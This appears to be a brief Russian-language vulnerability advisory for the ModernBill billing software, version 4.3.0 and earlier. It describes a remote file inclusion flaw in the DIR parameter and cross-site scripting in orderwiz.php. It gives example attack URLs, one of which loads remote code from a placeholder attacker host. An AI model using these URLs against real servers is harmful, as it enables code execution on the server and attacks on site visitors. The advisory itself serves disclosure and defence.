Программа: ModernBill 4.3.0 и более ранние версии
Уязвимость позволяет удаленному
пользователю выполнить произвольные
команды на целевой системе и произвести XSS
нападение.
1. Уязвимость существует из-за
недостаточной фильтрации входных данных в
параметре DIR сценария 'include/functions.inc.php'.
Удаленный пользователь может с помощью
специально сформированного URL выполнить
произвольный PHP сценарий на целевой системе
с привилегия web сервера.
Пример:
http://[target]/samples/news.php?DIR=http://[attacker]/
2. Уязвимость существует из-за
недостаточной фильтрации входных данных в
параметрах 'aid' и 'c_code' сценария 'orderwiz.php'.
Удаленный пользователь может с помощью
специально сформированного URL выполнить
произвольный HTML сценарий в браузере жертвы
в контексте безопасности уязвимого сайта.
Пример:
http://[target]/order/orderwiz.php?v=1&aid=&c_code=[XSS]
http://[target]/order/orderwiz.php?v=1&aid=[XSS]
